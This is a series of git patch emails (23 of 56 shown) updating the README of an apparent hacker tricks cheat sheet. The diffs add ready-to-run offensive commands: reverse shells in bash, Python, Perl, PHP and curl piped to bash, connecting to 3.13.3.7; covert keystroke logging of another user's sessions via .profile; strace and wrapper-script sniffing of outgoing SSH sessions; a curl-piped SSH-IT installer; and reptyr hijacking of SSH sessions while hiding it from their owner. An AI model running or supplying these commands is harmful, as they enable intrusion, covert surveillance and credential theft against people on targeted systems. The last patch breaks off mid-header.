From 57aaebd1751872e0b329d79f615e4f057eb680b1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 21 Sep 2023 17:23:35 +0100 Subject: [PATCH 01/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2ed8c2e..240db79 100644 --- a/README.md +++ b/README.md @@ -1754,8 +1754,8 @@ Telegram Channels 1. [BookZillaaa](https://t.me/bookzillaaa) Mindmaps & Knowledge +1. [Compass Sec Cheat Sheets](https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet) 1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg) -1. [Z Library](https://singlelogin.me)/[Z Library on TOR](http://bookszlibb74ugqojhzhg2a63w5i2atv5bqarulgczawnbmsb6s6qead.onion/) **12.ii. Cool Linux commands** From 3f93c4210c195abe7f1d8cb40109b614946f89f2 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 26 Sep 2023 08:49:48 +0100 Subject: [PATCH 02/56] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 240db79..1464fd1 100644 --- a/README.md +++ b/README.md @@ -1599,6 +1599,8 @@ Virtual Private Servers 7. https://bithost.io - Reseller for DigitalOcean, Linode, Hetzner and Vultr (accepts Crypto) 8. https://www.privatelayer.com - Swiss based. +See [other KYC Free Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/)) + Proxies (we dont use any of those) 1. [V2Ray Proxies](https://github.com/mahdibland/V2RayAggregator) 2. [Hola Proxies](https://github.com/snawoot/hola-proxy) @@ -1657,6 +1659,7 @@ Comms 1. [Temp-Mail](https://temp-mail.org/en/) - Disposable email service with great Web GUI. Receive only. 1. [Quackr.Io](https://quackr.io/) - Disposable SMS/text messages (List of [Disposable-SMS-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-SMS-services)). 1. [Crypton](https://crypton.sh/) - Rent a private SIM/SMS with crypto ([.onion](http://cryptonx6nsmspsnpicuihgmbbz3qvro4na35od3eht4vojdo7glm6yd.onion/)) +2. [List of "No KYC" Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/)) OpSec 1. [OpSec for Rebellions](https://medium.com/@hackerschoice/it-security-and-privacy-for-the-rebellions-of-the-world-db4023cadcca) - Start Here. The simplest 3 steps. From 4885c00ccfb19bd2567e82a723782067bd1ed74f Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 27 Sep 2023 18:45:36 +0100 Subject: [PATCH 03/56] Update README.md --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1464fd1..3034326 100644 --- a/README.md +++ b/README.md @@ -33,7 +33,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Check reachability from around the world](#check-reachable) 1. [Check/Scan Open Ports](#check-open-ports) 1. [Crack Passwords hashes](#bruteforce) - 1. [Brute Force Passwords](#bruteforce) + 1. [Brute Force Passwords / Keys](#bruteforce) 1. [Data Upload/Download/Exfil](#exfil) 1. [File Encoding/Decoding](#file-encoding) 1. [File transfer using cut & paste](#cut-paste) @@ -588,7 +588,7 @@ hashcat --username -w3 my-hash /usr/share/wordlists/rockyou.txt Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net) or [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or on [AWS](https://akimbocore.com/article/hashcracking-with-aws/). -**3.ix. Brute Force Passwords** +**3.ix. Brute Force Passwords / Keys** The following is for brute forcing (guessing) passwords of ONLINE SERVICES. @@ -613,6 +613,7 @@ Tools: * [THC Hydra](https://sectools.org/tool/hydra/) * [Medusa](https://www.geeksforgeeks.org/password-cracking-with-medusa-in-linux/) / [docs](http://foofus.net/goons/jmk/medusa/medusa.html) * [Metasploit](https://docs.rapid7.com/metasploit/bruteforce-attacks/) +* [Crowbar](https://github.com/galkan/crowbar) - great for trying all ssh keys on a target IP range. Username & Password lists: * `/usr/share/nmap/nselib/data` From b1a36c3d248a36f291602575a245d2fc5032f7fb Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 27 Sep 2023 18:48:24 +0100 Subject: [PATCH 04/56] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 3034326..68a3f34 100644 --- a/README.md +++ b/README.md @@ -1724,6 +1724,7 @@ Tunneling Exfil 1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l` / `blitz foo.txt` +2. [RedDrop](https://github.com/cyberbutler/RedDrop) - run your own Exfil Server 1. [Mega](https://mega.io/cmd) 2. [oshiAt](https://oshi.at/) - also on TOR. `curl -T foo.txt https://oshi.at` 5. [Transfer.sh](https://transfer.sh/) - `curl -T foo.txt https://transfer.sh` From 42bd0a973e3df95358565a1c829ee9c38c5aba25 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 10:33:56 +0100 Subject: [PATCH 05/56] Update README.md --- README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/README.md b/README.md index 68a3f34..5ba8886 100644 --- a/README.md +++ b/README.md @@ -70,6 +70,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Clean logfile](#shell-clean-logs) 1. [Hide files from a User without root privileges](#shell-hide-files) 1. [Find out Linux Distro](#linux-info) + 2. [Find +s binaries / Find writeable directories](#suid) 1. [Crypto](#crypto) 1. [Generate quick random Password](#gen-password) 1. [Linux transportable encrypted filesystems](#crypto-filesystem) @@ -1413,6 +1414,17 @@ curl -sL bench.sh | bash # curl -sL yabs.sh | bash ``` + +**7.vi. Find +s files / Find writeable directory + +``` +find / -xdev -type f -perm /6000 -ls 2>/dev/null +``` + +``` +find / -xdev -writable 2>/dev/null +``` + --- ## 8. Crypto From d42e4b170d295f38198053684359c08c2203d4db Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 10:36:12 +0100 Subject: [PATCH 06/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5ba8886..7555024 100644 --- a/README.md +++ b/README.md @@ -1404,7 +1404,7 @@ cd $'\t' ```sh # Find out Linux Distribution -uname -a; lsb_release -a; cat /etc/*release /etc/issue* /proc/version +uname -a; lsb_release -a 2>/dev/null; cat /etc/*release /etc/issue* /proc/version /etc/hosts 2>/dev/null ``` ```sh From 18b3cd9c5093245167785455ddde0a09fb3eda0a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 11:52:46 +0100 Subject: [PATCH 07/56] Update README.md --- README.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/README.md b/README.md index 7555024..0583725 100644 --- a/README.md +++ b/README.md @@ -1425,6 +1425,23 @@ find / -xdev -type f -perm /6000 -ls 2>/dev/null find / -xdev -writable 2>/dev/null ``` +Find all writeable directories: +```sh +wfind() { + local arr dir + + arr=("$@") + while [[ ${#arr[@]} -gt 0 ]]; do + dir=${arr[${#arr[@]}-1]} + unset 'arr[${#arr[@]}-1]' + find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null + IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null)) + done +} +# Usage: wfind / +# Usage: wfind /etc /var /usr +``` + --- ## 8. Crypto From 21aab4a0c207062e762a5a44bf999602ff214599 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 11:53:25 +0100 Subject: [PATCH 08/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0583725..38664c4 100644 --- a/README.md +++ b/README.md @@ -1415,7 +1415,7 @@ curl -sL bench.sh | bash ``` -**7.vi. Find +s files / Find writeable directory +**7.vi. Find +s files / Find writeable directory** ``` find / -xdev -type f -perm /6000 -ls 2>/dev/null From 15724ddff708c69cae9beef660e0b779ff04f3a1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 13:13:52 +0100 Subject: [PATCH 09/56] Update README.md --- README.md | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/README.md b/README.md index 38664c4..10c8a87 100644 --- a/README.md +++ b/README.md @@ -1417,14 +1417,11 @@ curl -sL bench.sh | bash **7.vi. Find +s files / Find writeable directory** +Find all suid/sgid binaries: ``` find / -xdev -type f -perm /6000 -ls 2>/dev/null ``` -``` -find / -xdev -writable 2>/dev/null -``` - Find all writeable directories: ```sh wfind() { From 2d3c9435d02b2f4ecfd065a4f32f550d00643ab9 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 6 Oct 2023 13:39:22 +0100 Subject: [PATCH 10/56] Update README.md --- README.md | 26 +++++++++++++++++++++----- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 10c8a87..afe1bd4 100644 --- a/README.md +++ b/README.md @@ -49,6 +49,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Reverse Shells](#reverse-shell) 1. [with gs-netcat](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) + 2. [with cURL](#curlshell) 1. [without Bash](#reverse-shell-no-bash) 1. [with remote.moe](#revese-shell-remote-moe) 1. [with Python](#reverse-shell-python) @@ -1082,8 +1083,23 @@ bash -c '(exec bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' ``` + +**5.i.c. Reverse shell with cURL** + +Use [curlshell](https://github.com/SkyperTHC/curlshell). This also works through proxies and when direct TCP connection to the outside world is prohibited: +```sh +# Generate SSL keys: +openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC" +# Start your listening server: +./curlshell.py --certificate cert.pem --private-key key.pem --listen-port 8080 +``` +```sh +# On the target: +curl -skfL https://1.2.3.4:8080 | bash +``` + -**5.i.c. Reverse shell without Bash** +**5.i.d. Reverse shell without Bash** Embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: @@ -1114,7 +1130,7 @@ Note: Use */tmp/.fio* if */dev/shm* is not available. Note: This trick logs your commands to a file. The file will be *unlinked* from the fs after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. -**5.i.d. Reverse shell with remote.moe and ssh** +**5.i.e. Reverse shell with remote.moe and ssh** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): @@ -1141,13 +1157,13 @@ rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p & ``` -**5.i.e. Reverse shell with Python** +**5.i.f. Reverse shell with Python** ```sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` -**5.i.f. Reverse shell with Perl** +**5.i.g. Reverse shell with Perl** ```sh # method 1 @@ -1156,7 +1172,7 @@ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotob perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ``` -**5.i.g. Reverse shell with PHP** +**5.i.h. Reverse shell with PHP** ```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' From 1edccd966a357c0ab6a026fcf3380fad348f1eef Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 6 Oct 2023 16:21:45 +0100 Subject: [PATCH 11/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index afe1bd4..158f7c6 100644 --- a/README.md +++ b/README.md @@ -296,7 +296,7 @@ thcssh() { local ttyp echo -e "\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\e[0;36m" - echo -e 'PS1="{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ "\e[0m' + echo -e "PS1='{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '\e[0m" ttyp=$(stty -g) stty raw -echo opost [[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no" From f7013b09111cdd0900b89b6420dac84b44f3c860 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 6 Oct 2023 16:29:08 +0100 Subject: [PATCH 12/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 158f7c6..9346c4c 100644 --- a/README.md +++ b/README.md @@ -296,7 +296,7 @@ thcssh() { local ttyp echo -e "\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\e[0;36m" - echo -e "PS1='{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '\e[0m" + echo -e "PS1='"'{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'\e[0m" ttyp=$(stty -g) stty raw -echo opost [[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no" From 947c8c2faec0c11efaf7acc9edbb839a4db3ab90 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:27:57 +0100 Subject: [PATCH 13/56] Update README.md --- README.md | 25 +++++++++++++++++++++++-- 1 file changed, 23 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9346c4c..f8b970b 100644 --- a/README.md +++ b/README.md @@ -28,6 +28,8 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Discover hosts](#discover) 1. [Tcpdump](#tcpdump) 1. [Tunnel and forwarding](#tunnel) + 1. [Raw TCP reverse ports](#ports) + 1. [HTTPS reverse forwards](#https) 1. [Use any tool via Socks Proxy](#scan-proxy) 1. [Find your public IP address](#your-ip) 1. [Check reachability from around the world](#check-reachable) @@ -446,8 +448,27 @@ openssl s_client -connect smtp.gmail.com:465 socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465 ``` + +**3.iii.a Raw TCP reverse ports** + +Using [segfault.net])(https://thc.org/segfault.net) (free): +```sh +echo "Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)" +nc -vnlp $(cat /config/self/reverse_port) +``` + +Using [bore.pub](https://github.com/ekzhang/bore) (free): +```sh +# Forward a random public TCP port to localhost:31337 +bore local 31337 --to bore.pub``` +``` + +See also [remote.moe](?revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. + +Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets). + -**3.iii.b. HTTPS reverse tunnels** +**3.iii.b HTTPS reverse tunnels** On the server: ```sh @@ -590,7 +611,7 @@ hashcat --username -w3 my-hash /usr/share/wordlists/rockyou.txt Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net) or [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or on [AWS](https://akimbocore.com/article/hashcracking-with-aws/). -**3.ix. Brute Force Passwords / Keys** +**3.xi. Brute Force Passwords / Keys** The following is for brute forcing (guessing) passwords of ONLINE SERVICES. From d03a83a335e0daf7d5504d35c9af952da8a6ab18 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:28:58 +0100 Subject: [PATCH 14/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f8b970b..7324b32 100644 --- a/README.md +++ b/README.md @@ -463,7 +463,7 @@ Using [bore.pub](https://github.com/ekzhang/bore) (free): bore local 31337 --to bore.pub``` ``` -See also [remote.moe](?revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. +See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets). From 70cef1de330c44e6ba132d6f0f06ec2bf379be32 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:29:27 +0100 Subject: [PATCH 15/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7324b32..00457ca 100644 --- a/README.md +++ b/README.md @@ -451,7 +451,7 @@ socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465 **3.iii.a Raw TCP reverse ports** -Using [segfault.net])(https://thc.org/segfault.net) (free): +Using [segfault.net](https://thc.org/segfault.net) (free): ```sh echo "Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)" nc -vnlp $(cat /config/self/reverse_port) From 8e32477074ce8b93bd7f76d5cf88aea8d671a135 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:43:15 +0100 Subject: [PATCH 16/56] Update README.md --- README.md | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 00457ca..275528e 100644 --- a/README.md +++ b/README.md @@ -470,9 +470,9 @@ Other free services are limited to forward HTTPS only (not raw TCP). Some tricks **3.iii.b HTTPS reverse tunnels** -On the server: +On the server, use any one of these three tunneling services: ```sh -### Reverse HTTPS tunnel to forward public HTTPS requests to Port 8080 on this server: +### Reverse HTTPS tunnel to forward public HTTPS requests to this server's port 8080: ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@localhost.run ### Or using remote.moe ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@remote.moe @@ -481,29 +481,32 @@ curl -fL -o cloudflared https://github.com/cloudflare/cloudflared/releases/lates chmod 755 cloudflared cloudflared tunnel --url http://localhost:8080 --no-autoupdate ``` -Either tunnel will generate a new HTTPS-URL for you. Use this URL on your workstation (see below). Use [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) to tunnel raw TCP over the HTTP(s) link. +Either service will generate a new temporary HTTPS-URL for you to use. Optionally, use [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) on both ends to tunnel raw TCP over the HTTPS URL. -A simple STDIN/STDOUT pipe via HTTPS: +A. A simple STDIN/STDOUT pipe via HTTPS: ```sh +### On the server convert WebSocket to raw TCP: websocat -s 8080 -### and on the workstation use this command to connect: +``` +```sh +### On the remote target forward stdin/stdout to WebSocket: websocat wss:// ``` -Or run a Socks-Proxy (via HTTPS): +B. Forward raw TCP via HTTPS: ```sh ### On the server gost -L mws://:8080 ``` -On the workstation: - Forward port 2222 to the server's port 22. ```sh +### On the workstation: gost -L tcp://:2222/127.0.0.1:22 -F 'mwss://:443' ``` -or use it as a Socks-Proxy: +or use the server as an Socks-Proxy EXIT node (from the workstation, via the HTTPS reverse tunnel): ```sh +### On the workstation: gost -L :1080 -F 'mwss://:443' ### Test the Socks-proxy: curl -x socks5h://0 ipinfo.io From 8bc58c8cf3278d08f8db609e09a28b408777dad7 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:51:44 +0100 Subject: [PATCH 17/56] Update README.md --- README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 275528e..04aa84e 100644 --- a/README.md +++ b/README.md @@ -495,7 +495,7 @@ websocat wss:// B. Forward raw TCP via HTTPS: ```sh -### On the server +### On the server: Gost will translate any HTTP-websocket request to any raw TCP socks5 request: gost -L mws://:8080 ``` @@ -503,8 +503,10 @@ Forward port 2222 to the server's port 22. ```sh ### On the workstation: gost -L tcp://:2222/127.0.0.1:22 -F 'mwss://:443' +### Test the connection (will connect to localhost:22 on the server) +nc -vn 127.0.0.1 2222 ``` -or use the server as an Socks-Proxy EXIT node (from the workstation, via the HTTPS reverse tunnel): +or use the server as a Socks-Proxy EXIT node (e.g. access any host inside the server's network or even the Internet via the server (using the HTTPS reverse tunnel from above): ```sh ### On the workstation: gost -L :1080 -F 'mwss://:443' From 43ebd78d7728497795f3868c17f37b4b78a0eb7b Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:52:25 +0100 Subject: [PATCH 18/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 04aa84e..3109259 100644 --- a/README.md +++ b/README.md @@ -460,7 +460,7 @@ nc -vnlp $(cat /config/self/reverse_port) Using [bore.pub](https://github.com/ekzhang/bore) (free): ```sh # Forward a random public TCP port to localhost:31337 -bore local 31337 --to bore.pub``` +bore local 31337 --to bore.pub ``` See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. From 3ff01be6581ae05d8131d136048b7a6dd407ccef Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 12:14:37 +0100 Subject: [PATCH 19/56] Update README.md --- README.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 3109259..dc1fde8 100644 --- a/README.md +++ b/README.md @@ -470,7 +470,7 @@ Other free services are limited to forward HTTPS only (not raw TCP). Some tricks **3.iii.b HTTPS reverse tunnels** -On the server, use any one of these three tunneling services: +On the server, use any one of these three HTTPS tunneling services: ```sh ### Reverse HTTPS tunnel to forward public HTTPS requests to this server's port 8080: ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@localhost.run @@ -481,7 +481,9 @@ curl -fL -o cloudflared https://github.com/cloudflare/cloudflared/releases/lates chmod 755 cloudflared cloudflared tunnel --url http://localhost:8080 --no-autoupdate ``` -Either service will generate a new temporary HTTPS-URL for you to use. Optionally, use [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) on both ends to tunnel raw TCP over the HTTPS URL. +Either service will generate a new temporary HTTPS-URL for you to use. + +Then, use [websocat](https://github.com/vi/websocat) or [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) on both ends to tunnel raw TCP over the HTTPS URL: A. A simple STDIN/STDOUT pipe via HTTPS: ```sh @@ -495,7 +497,7 @@ websocat wss:// B. Forward raw TCP via HTTPS: ```sh -### On the server: Gost will translate any HTTP-websocket request to any raw TCP socks5 request: +### On the server: Gost will translate any HTTP-websocket request to a TCP socks5 request: gost -L mws://:8080 ``` From 793f4a14a860c2ebd4a86c72a3e21f4299344e3e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 15:56:18 +0100 Subject: [PATCH 20/56] Update README.md --- README.md | 48 +++++++++++++++++++++++++++++++----------------- 1 file changed, 31 insertions(+), 17 deletions(-) diff --git a/README.md b/README.md index dc1fde8..edcd059 100644 --- a/README.md +++ b/README.md @@ -80,11 +80,12 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [cryptsetup](#crypto-filesystem) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) -1. [Sniffing a user's SSH session](#ssh-sniffing) - 1. [with strace](#ssh-sniffing-strace) - 1. [with script](#ssh-sniffing-script) - 1. [with a wrapper script](#ssh-sniffing-wrapper) - 1. [with SSH-IT](#ssh-sniffing-sshit) +1. [SSH session sniffing and hijaking](#ssh-sniffing) + 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) + 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) + 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) + 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) + 1. [Hijak / Take-over a running SSH session](#hijak) 1. [VPN and Shells](#vpn-shell) 1. [Disposable Root Servers](#shell) 1. [VPN/VPS Providers](#vpn) @@ -1566,15 +1567,10 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. --- ## 9. SSH Sniffing - -**9.i Sniff a user's SSH session with strace** -```sh -strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done -``` -Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control. - -**9.ii Sniff a user's SSH session with script** +**9.i Sniff a user's SHELL session with script** + +A method to log the shell session of a user (who logged in via SSH). The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in: ```sh @@ -1582,10 +1578,18 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile ``` Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. - -**9.iii. Sniff a user's SSH session with a wrapper script** + +**9.ii Sniff a user's outgoing SSH session with strace** +```sh +strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done +``` +Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control. -Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0) + + +**9.iii. Sniff a user's outgoing SSH session with a wrapper script** + +Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions) Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
@@ -1629,7 +1633,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH. -**9.iv Sniff a user's SSH session using SSH-IT** +**9.iv Sniff a user's outgoing SSH session using SSH-IT** The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). @@ -1637,6 +1641,16 @@ The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-i bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` + +**9.v Hijak / Take-over a running SSH session** + +Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: +```sh +ps alxww | grep ssh +./reptyr +### or: ./reptyr $(pidof -s ssh) +``` + --- ## 10. VPN & Shells From c038c3882f3db73a172ede3bb050c869f904e502 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 16:09:34 +0100 Subject: [PATCH 21/56] Update README.md From 7c4128327a87f300f6121ffcb982814017cc5c3c Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 16:26:14 +0100 Subject: [PATCH 22/56] Update README.md --- README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index edcd059..2dcc7c8 100644 --- a/README.md +++ b/README.md @@ -1646,9 +1646,10 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh -ps alxww | grep ssh -./reptyr -### or: ./reptyr $(pidof -s ssh) +ps ax -o pid,ppid,cmd | grep 'ssh ' +./reptyr -T +### or: ./reptyr -T $(pidof -s ssh) +### Must use '-T' or otherwise the original user will see that his SSH process gets suspended. ``` --- From 2df2aed368059c93e6e3845ff7df9529ff602cf5 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:18:21 +0100 Subject: [PATCH 23/56] Update README.md --- README.md | 24 ++++++++++++++---------- 1 file changed, 14 insertions(+), 10 